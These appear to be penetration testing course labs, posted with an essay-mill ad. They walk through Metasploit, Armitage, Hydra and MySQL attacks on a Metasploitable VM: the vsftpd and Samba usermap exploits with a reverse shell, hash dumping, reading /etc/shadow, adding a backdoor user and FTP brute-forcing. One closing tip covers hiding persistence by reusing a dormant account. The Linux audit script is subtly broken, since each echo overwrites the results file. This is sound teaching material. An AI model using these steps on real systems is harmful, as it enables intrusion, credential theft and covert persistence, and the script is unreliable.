Computer Science

Useful database commands are:

db_connect (Connects you to an existing database.)

db_disconnect (Disconnects you from a database.)

db_driver (Allows you to specify the type of database you will be connecting

to: MySQL, SQLite, PostgreSQL, etc.)

db_status (Tells you the type of database you’re connected to.)

db_export (Allows you export the contents of the database to XML.)

1. We know we are connected to the database so now let’s populate it with

target information. Switch back to your Kali VM and return to the Metasploit prompt msf>.

2. Type: db_nmap x.x.x.x (IP of your target.)

3. You’ve just added the contents of your nmap scan to the database. Let’s

view the individual tables.

4. Type: hosts

a. What hosts are listed in the table?

ANSWER:

5. Type: services

a. What information is provided in this table?

ANSWER:

6. We would normally also type “notes” or “loot” or “vulns” but we haven’t

populated the database with any of that information. FYI, the vulns information

may be imported from .nessus files. If you’re not familiar with Nessus Google

it for quick reference. These tables will populate as you exploit systems.

Interact with a database when performing reconnaissance or running a

vulnerability scan may not seem immensely helpful in a lab setting because

we’re only scanning 1 system but what if we were scanning 10 systems or 100

systems or 1000 systems or 10000 systems or even more? It is simply not

feasible for a pen tester to scroll through the results and manually document

interesting findings. That’s where the beauty of logging our penetration

testing results to databases really pays off. Being able to instantly reference

all of the hosts we’ve scanned for a project or reviewing all of the possible

vulnerabilities in systems we’ll be exploiting is a professional approach to

handling the mountains of data that may be generated during a customer

engagement.

Updating Metasploit Lab

Class:

Name:

Date:

1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word “Places”.

3. Launch Metasploit by typing: msfconsole

There are many reasons to update Metasploit. Updating Metasploit will install bug fixes, new community tools, and most importantly – add exploit modules. There are two ways to do this. Your first option is to update Metasploit in an automated fashion by typing “msfupdate” at the command line. This requires registration with Rapid7 for a community edition key. This will update Metasploit with the latest settings, ruby version, modules, etc. You may also simply update Kali by going to “Applications-System Tools-Software Update”. The second way to update Metasploit is manually. Being able to update Metasploit is important because it allows you to import the latest exploits, regardless of where you find them, as long as they follow Rapid7’s development rules for Metasploit modules. It’s also important because the automated update tool will sometimes break your Metasploit install by modifying your Ruby version or making another change to your environment. This lab will focus on sharpening your skills as penetration testers by having you search for an exploit online, download the exploit, install the exploit, and test the exploit. There is a third way to update Metasploit – Build your own module. You’ll have to know how to program in Ruby. You can learn more about Metasploit exploit development here: http://www.offensive-security.com/metasploit-unleashed/Exploit_Development

1. Using your Kali VM, open the Iceweasel web browser by clicking on the icon to the right of the word “Places” and navigate to: http://www.exploit-db.com/ WordPress is a popular content management system used for blogging on the world wide web. It has been in the news recently for having multiple vulnerabilities.

2. Click on the “Search” button.

3. In the “Free Text Search” field type: WordPress

4. Click “Search”.

5. Look at the exploits and notice the information on the left of the screen. One of the most important things to notice is the check mark. The check mark indicates the exploit has been vetted by the Rapid7 community. It’s critical that you only import and use trusted exploits. Otherwise, you could be importing a trojan horse, or worse, onto your system or your customer’s system.

6. Go to page 9 and click on “WordPress HMS Testimonials Plugin 2.0.10 – Multiple Vulnerabilities”.

7. Who is the author of this exploit?

7a. Answer:

8. What date was this exploit published?

8a. Answer:

9. Now click the download icon next to these words “Exploit Code:”.

10. What type of file is this?

10a. Answer:

11. Open the file that you downloaded. As you can see these are instructions for exploiting a WordPress vulnerability in the way user feedback may be posted. So how would you go about loading this module into Metasploit? You wouldn’t. This is simply a text file that walks through manually exploiting WordPress but I chose to show it to you because, as you can see, when you’re looking for the latest exploits you don’t always need to load a module. There are hands-on instructions for exploiting this vulnerability. If there isn’t a current exploit in Metasploit for your vulnerability be sure to check Exploit-db.com, not just for modules but also for hands-on exploit instructions.

Metasploit is built on the Ruby programming framework. This means that our modules need to be .rb files. Any exploits that we want to import will need to be converted to Ruby code if they aren’t already.

12. Close the text file and return to the web page. Go to page 9 and locate this exploit and click on it: WordPress W3 Total Cache PHP Code Execution

13. Click the download icon. When prompted to save the file name it: wordpress_w3_php_code_exec.rb Hit the drop-down arrow next to “Save in folder:” and select “Desktop”.

14. Click “Save”.

15. Minimize all of your windows. You should see a Ruby file on your desktop.

16. Switch your focus to your Metasploit instance. How many exploits are listed? Type: banner

16a. Answer:

17. Now it’s time to import your new Ruby file to the Metasploit framework. Open a shell by clicking on the black box next to the word “Places” at the top of your desktop screen. Type this to copy in your new exploit: cp /root/Desktop/wordpress_w3_php_code_exec.rb

/usr/share/metasploit-framework/modules/exploits/multi/php

18. Switch back to your Metasploit shell and type: reload_all

19. How many exploits do you have now?

19a. Answer:

20. Type: use exploit/multi/php/wordpress_w3_php_code_exec

21. Type: info

What does this module do?

21a. Answer:

You now have a better understanding of when to download an exploit versus updating your entire Metasploit install. You’ve downloaded an exploit that you needed and manually added it to Metasploit. You’ve looked for a recently published exploit, download it, copied it to the appropriate location within Metasploit, and verified its availability as a module.

Now let’s look at the professional version of Metasploit.

Type: go_pro

Follow the prompts to upgrade your Metasploit version from the framework edition to the professional version.

Metasploit Scanning Lab

Class:

Name:

Date:

1. If your VMs aren’t already running then open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word “Places”.

3. Type: msfconsole

4. Open another instance of VMware Player and launch the Metasploitable VM.

5. At the user logon prompt type: msfadmin

6. At the password prompt type: msfadmin

7. Type: ifconfig

8. Record the Metasploitable VM IP address here:

Metasploit has numerous scanners located in various places. Let’s become familiar with how to find and identify the scanners we need. Not all scanners are built alike. Some are very limited but very good at what they do while others are more broad in functionality and applicable in many instances.

Switch to you Kali VM and type “back” if you currently have a module loaded from a previous lab.

1. Open another shell and type: ls /usr/share/metasploit-framework/modules/auxiliary/scanner/portscan

2. These are just a few of the built in port scanners Metasploit has to offer.

2a. What port scanners are available?

ANSWER:

3. Pick one and list the options and advanced options.

3a. Switch to your Kali VM and type: use auxiliary/scanner/portscan/xmas

3b. Type: show options

3c. Type: show advanced

ANSWER:

4. Type: back

5. Switch to the other shell (Not Metasploit.) and type: ls /usr/share/metasploit-framework/modules/auxiliary/scanner/discovery

6. Notice we have more discovery tools.

6a. List a tool and what it does.

6b. Switch back to your other shell and type:

use auxiliary/scanner/discovery/arp_sweep

6c. Type: show options

6d. Type: show advanced

ANSWER:

7. Let’s search for more scanners.

7a. Type: search type:auxiliary scanner

7b. If you have trouble reading the output make sure your shell is maximized as well as your instance of VMware.

8. What scanner may I use to brute force Outlook Web Access logins?

8a. Type: search type:auxiliary outlook

8a. Who wrote the module? Type: info

8b. Type: info auxiliary/scanner/http/owa_login

9. What is the pcanywhere_login module good for?

9a. Type: search type:auxiliary pcanywhere_login

9b. Type: info auxiliary/scanner/pcanywhere/pcanywhere_login

ANSWER:

Now let’s learn how to use the “info” command to gather information about modules.

10. Type: info auxiliary/scanner/mssql/mssql_ping

10a. What does this module do?

ANSWER:

Now let’s look at everyone’s favorite scanner Nmap. Nmap is a tool every pen tester, system administrator, network administrator, etc, should be familiar with.

*If you currently have a module loaded type: back

1. Type “nmap”. Notice the exhaustive output. The switch syntax is given along with a description of the command.

2. Type: nmap -sT x.x.x.x (x.x.x.x. is the IP address of the Metasploitable VM.)

2a. What were some of your findings?

ANSWER:

3. Now that we’ve used Nmap to find and scan a host let’s see if we can connect.

4. At the msf console type: connect help

4a. View the options.

5. To verify a port is open on your target and you can connect to it type “connect -z x.x.x.x 21” This will connect you to the FTP port on your target system, if the FTP service is running.

5a. Go ahead and see if you are able to connect to the target using the above command. What are the results.

ANSWER:

6. Now that you know the FTP port is open you can search for exploits. Type: search platform:linux type:exploit ftp

6a. List two exploits.

ANSWER:

We’ve explored scanning with Metasploit by searching for multiple scanner modules, loading them, and exploring their functions. We also used an industry favorite, Nmap, to target our victim VM. We connected to an open port to confirm connectivity and then looked up available exploits in the Metasploit database. In the labs ahead we’ll be using the information we’ve gathered to continue looking up exploits and leveraging them against vulnerabilities.

Armitage Lab

Class:

Name:

Date:

1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word “Places”.

3. DO NOT LAUNCH METASPLOIT

4. Type: service postgresql start

5. Launch your Metasploitable VM.

6. At the user logon prompt type: msfadmin

7. At the password prompt type: msfadmin

8. Type: ifconfig

9. Record the IP address here:

Armitage is described as a “cyber attack management tool”. Armitage is a GUI for Metasploit. It does not replace Metasploit but it does provide a way to visualize your targets. It also makes the use of Metasploit collaborative by being able to support more than one user at the same time. Armitage has other features such as suggestions. While Armitage is heavily integrated with Metasploit it does not entirely replace the command line so the command line is still available from within the GUI. We will explore the use of Armitage in this lab to gain a better understanding of its capabilities as a penetration testing tool.

1. Using the shell you already have open in your Kali VM type: armitage

2. Click “Connect” at the first prompt and then “Yes” to start the service that connects to the Metasploit database. (Accept the defaults. Do not change the IP address from 127.0.0.1.)

3. Click “Hosts-Add Hosts” and enter the IP of your Metasploitable VM.

4. (ONLY DO THIS IF YOU HAVE UNWANTED HOSTS.) Remove any unwanted hosts that populate from the Metasploit database from previous scans. Right-click on the unwanted host and select “Host-Remove Host”.

5. Look at the “Console” tab at the bottom left of the screen. Type “hosts” at the msf prompt and hit Enter. What is the result?

ANSWER:

6. Type: services What is the result?

ANSWER:

5. Right-click on the Metasploitable host computer icon top-right frame and select “Scan”. This triggers multiple scans. Module after module is loaded, run, and then the results are automatically written to the Metasploit db.

a. What scan launches first?

ANSWER:

b. What does it find?

ANSWER:

b. What FTP version is running?

ANSWER:

c. What SSH version is running?

ANSWER:

d. What version of web server is running and on what OS?

ANSWER:

e. What Windows/Linux domain integration and file server software is running?

ANSWER:

f. What version of MySQL is running?

ANSWER:

g. What version of Postgres is running?

ANSWER:

6. Wait until all of the scans have completed and then go to the “Attacks” menu at the top of the Armitage window. Select “Find Attacks” and wait for a prompt confirming attacks have been added. This can take up to 10 minutes. Be patient and wait for the prompt.

7. Right-click on your target and notice “Attack” has been added to the menu.

8. Right-click on your target and select “Attack-FTP-vsftpd_234_backdoor”. Accept defaults and click “Launch”. If that attack doesn’t work then click on “Attacks-Hail Mary”.

9. Once the Linux box has turned red and appears to have lightning around it click within the “Console” tab at the bottom left of your screen. Type: sessions

a. What IP are you connected to?

ANSWER:

b. What type of connection do you have?

ANSWER:

9. Right-click on the compromised target and select “Shell 1-Post Modules”.

10. Select the “hashdump” post module from the tree in the left-hand pane by double-clicking on it. (You will have to scroll down. It’s under “gather”.) Go with the defaults and click “Launch”. What information populated in the new tab?

ANSWER:

11. Go to the “View” menu. Select “Loot”. What is the Loot tab telling you?

ANSWER:

12. Now let’s enumerate the system with Armitage. In the top left window pane navigate to “post-linux-gather” and select the enum_system post module by double-clicking on it. What types of information was gathered?

13. Go to “View” and select “loot”.

a. What was added to your loot?

ANSWER:

b. What is it possible to do with your loot?

ANSWER:

c. What should you do next?

ANSWER:

14. Right-click on the compromised target and select “Shell 1-Interact”.

15. Type: whoami

15a. Who are you logged in as?

ANSWER:

16. Type: pwd

16a. What is the present working directory?

ANSWER:

17. Type: ls

18. Type: adduser bob

18a. Follow the prompts to create a new user on your target. If you are continuously prompted for bob’s information skip to step 19.

19. Click on the Console tab at the very left of the bottom pane. Type “sessions -K” to kill all sessions.

20. Switch to your Metasploitable VM.

21. Type: exit

22. Login with user account “bob” and enter your password.

Final thoughts: Notice under the “Hosts” menu you have many important scanning options: Nmap, MSF Scans, DNS Enumeration Try using them against your target. Armitage is a fun and useful tool for quickly throwing exploits at systems to see what sticks and then playing with post modules in a controlled environment. It’s also a fantastic way to visualize all of your compromised systems. This is especially important if you have a lot of compromised systems. You have the ability to pass off sessions to your coworkers if you so choose, further strengthening the advantages of this unique and powerful open source penetration testing tool.

Database Attack Lab

Class:

Name:

Date:

This lab will follow a database penetration test from beginning to end in order to illustrate, in a hands-on way, the steps necessary to fully compromise a database. You will use a Metasploit module to identify an account you may use to login. Once logged in you will use SQL commands to explore the database.

1. If Metasploitable isn’t already running launch the Metasploitable VM.

2. At the user logon prompt type: msfadmin

3. At the password prompt type: msfadmin

4. Type: ifconfig

5. Record the IP address here:

6. Now switch to Kali.

7. Open a shell by clicking on the black box next to the word “Places”.

a. Type: service postgresql start

b. Type: service metasploit start

c. Type: service metasploit stop

8. Type: msfconsole

9. Scan your target for database technologies. Try to identify running database services on your target’s ports. Type: nmap x.x.x.x

10. Success! We’re identified multiple instances of database technologies running on our target. Let’s choose a service to target. For this example we’ll select MySQL.

11. Metasploit has multiple MySQL exploits. Type: search mysql

12. Type: use auxiliary/scanner/mysql/mysql_login

13. Type: info

14. Type: set rhosts x.x.x.x (IP of Metasploitable VM.)

15. Type: set username root

16. Type: set stop_on_success true

17. Let’s confirm the changes you made took. Type: info

18. Type: exploit

19. You determined the username root has no password. Congratulations. Let’s test our access to the MySQL database.

20. Open a new shell by clicking on the black box to the right of the word “Places”.

21. Type: mysql –h x.x.x.x (IP of Metasploitable.) –u root

22. Type: show databases;

23. Let’s pick a database and explore it. Type: use dvwa;

24. Now that we’ve picked a database let’s view the tables. Type: show tables;

25. Let’s see what data is being held in this table. Type: show columns from users;

26. Columns of interest are “user” and “password”. Type: select user, password from users;

27. You’ve successfully scanned for a database technology, found a vulnerable database service running on a target’s port, located the appropriate exploit for use and ran it. Now try exploiting a different database vulnerability, such as Postgresql.

Congratulations, you’ve used a Metasploit module to attack a database. You’ve accessed a database, enumerated the tables, identified fields of interest, and inspected their contents.

Network Attack Lab

Class: SEC6070

Name:

Date:

In this lab we will explore Metasploit network share exploitation.

28. If Metasploitable isn’t already running launch the Metasploitable VM.

29. At the user logon prompt type: msfadmin

30. At the password prompt type: msfadmin

31. Type: ifconfig

32. Record the IP address here:

33. Now switch to Kali.

34. Open a shell by clicking on the black box next to the word “Places”.

35. Let’s look for network share technologies in use. Type: nmap -A -p 139,445 x.x.x.x (IP of Metasploitable.)

We’ve gathered information on the network share technology being used. Now let’s launch Metasploit and use the relevant attack modules to exploit vulnerabilities in the network sharing technology we’ve identified.

36. Launch Metasploit. Type: msfconsole

37. Let’s search Metasploit’s database for samba exploits. Type: search samba

38. Type: use exploit/multi/samba/usermap_script

39. Type: info

40. Type: set rhost x.x.x.x (IP of Metasploitable VM.)

41. Type: set payload cmd/unix/reverse

42. Type: set lhost x.x.x.x (Your IP.)

43. Let’s confirm the changes you made took. Type: info

44. Type: exploit

45. Type: whoami

46. Type: pwd

47. Type: cat /etc/shadow

48. Type: cat /etc/passwd

Mission accomplished!

Closing thought: “whoami” returned “root”. You could create an account and set the password or you could use the “passwd” command to change the password on an account that hasn’t recently been used. That way if the /etc/passwd or /etc/shadow file are examined no new accounts would be identified. The possibilities are only limited to your imagination.

Password Brute Forcing Lab

Class:

Name:

Date:

1. Open VMware Player and launch the Kali VM and login as root with your

password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of

the desktop, to the right of the word “Places”.

3. Open another instance of VMware Player and launch the Metasploitable VM.

4. At the user logon prompt type: msfadmin

5. At the password prompt type: msfadmin

6. Type: ifconfig

7. Record the IP address here:

Hydra is a password brute forcing tool that supports many protocols. These are

just a few of the protocols: Samba, Cisco, IMAP, POP3, FTP, LDAP, Telnet, HTTP

Auth, VNC, MySQL, NNTP, SNMP

Let’s look at Hydra’s options.

1. Switch your focus to the Kali VM and, using the shell you already opened,

type: hydra

1a. Observe the commands available to configure Hydra.

We need wordlists to perform our bruteforcing.

2. Type: cd /usr/share/wordlists

The wordlist we want is zipped up to save space. Let’s unzip it.

3. Type: gunzip rockyou.txt.gz

Now let’s use Hydra.

4. Type: hydra -l ftp -P /usr/share/wordlists/rockyou.txt -f -v x.x.x.x (target IP address) ftp

What is/are the password(s) to the ftp user account?

4a. ANSWER:

Let’s test our findings.

5. Type: ftp x.x.x.x (IP of Metasploitable)

6. Type your username you found.

7. Type your password you found.

Confirm you have logged in.

8. Type: quit

As you can see, Hydra is a powerful password brute forcing tool. Some

applications of this tool are readily obvious. Hydra may be used to test

systems over the internet such as MySQL databases or Cisco devices.

But what about offline password cracking? John the Ripper is a popular

password cracking tool. It cracks password hashes offline, meaning you’ve

gathered the password hashes from sources such as a Windows SAM file or a Linux

shadow file and you are now going to run John the Ripper against those password

hash files. To learn more about John the Ripper type: John

Linux Audit Script Tutorial

You are going to create a Linux audit script. This script will demonstrate how to create an audit script, execute it, and read the contents of the file that is created. This is a short tutorial.

Open your Kali Linux VM. Launch a shell.

Type: nano

Enter this information:

===BEGIN SCRIPT===

#!/bin/sh

AUDIT_RESULTS=”/tmp/audit_results”

echo “===OPERATING SYSTEM & KERNEL INFORMATION===” > $AUDIT_RESULTS

uname -a >> $AUDIT_RESULTS

echo “===SYSTEM RESOURCE USAGE===” > $AUDIT_RESULTS

free >> $AUDIT_RESULTS

echo “===CURRENTLY LOGGED ON USER===” > $AUDIT_RESULTS

w >> $AUDIT_RESULTS

echo “===LAST LOGON===” > $AUDIT_RESULTS

last >> $AUDIT_RESULTS

echo “===ACCOUNTS===” > $AUDIT_RESULTS

cat /etc/passwd >> $AUDIT_RESULTS

echo “===DRIVE SPACE===” > $AUDIT_RESULTS

df -h >> $AUDIT_RESULTS

===END SCRIPT===

Press: “ctrl+x” and save the file with the name “linux.audit”.

To make the script executable type: chmod u+x linux.audit

To run the script type: ./linux.audit

To read the script output type: cat /tmp/audit_results

Order now and get 10% discount on all orders above $50 now!!The professional are ready and willing handle your assignment.

ORDER NOW »»